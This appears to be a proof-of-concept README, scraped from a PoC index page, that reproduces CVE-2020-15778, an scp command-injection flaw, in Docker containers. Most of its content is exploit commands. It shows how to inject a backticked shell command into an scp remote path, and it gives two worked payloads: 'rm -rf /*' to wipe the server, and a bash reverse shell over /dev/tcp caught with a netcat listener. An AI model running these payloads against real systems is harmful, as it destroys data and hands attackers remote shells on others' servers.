来源

关联漏洞

介绍

# CVE-2020-15778

## Introduction
This repo reproduces [CVE-2020-15778](https://nvd.nist.gov/vuln/detail/CVE-2020-15778).

## Steps
1. Build the docker images for scp server and client
```bash
cd client
docker build -t client-cve .
```
```bash
cd server
docker build -t server-cve .
```

2. Spin up the scp server in container.
```bash
docker run -d -P --name scp-server server-cve
```
Retrieve the internal IP address of the scp server by
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
```

3. Run the client in container.
```bash
docker run --name scp-client -i -t client-cve
```

4. Inject your own shell command to scp server by call scp command in the client.

In client terminal, run
```bash
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'
```
The password is "PASSWORD".

## Examples
Here're some examples for this exploit.

1. Delete everything in the server to crash it.
```bash
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
```

2. Reflect the bash of the scp server into the client (mimic ssh).

Listen to a port on client machine.
```bash
nc -lvvp 8080
```

Use scp to force the server mapping the interactive bash into the client machine.
```bash
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'
```

The client IP address can be retrieved by
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
```

文件快照

 [4.0K]  /data/pocs/2383933bd6854d1c41c39eea62b6dad43818e277
├── [4.0K]  client
│   └── [ 119]  Dockerfile
├── [1.5K]  README.md
└── [4.0K]  server
    └── [ 393]  Dockerfile

2 directories, 3 files

备注